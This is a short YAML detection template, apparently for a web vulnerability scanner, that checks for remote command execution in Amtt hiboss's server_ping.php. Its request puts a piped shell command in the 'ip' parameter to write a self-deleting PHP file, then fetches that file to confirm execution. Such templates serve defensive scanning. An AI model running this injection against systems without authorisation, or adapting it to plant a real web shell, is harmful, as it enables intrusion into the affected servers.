id: amtt-hiboss-server-ping-rce

info:
    name: Amtt hiboss Server Ping RCE
    author: YekkoY
    severity: high
    verified: false

set:
    r2: randomLowercase(10)
rules:
    r0:
        request:
            method: GET
            path: /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>">../../{{r2}}.php&id=1
        expression: response.status == 200 && response.body.bcontains(b"parent.doTestResult")
    r1:
        request:
            method: GET
            path: /{{r2}}.php
        expression: response.status == 200 && response.body.bcontains(bytes(md5(r2)))
expression: r0() && r1()
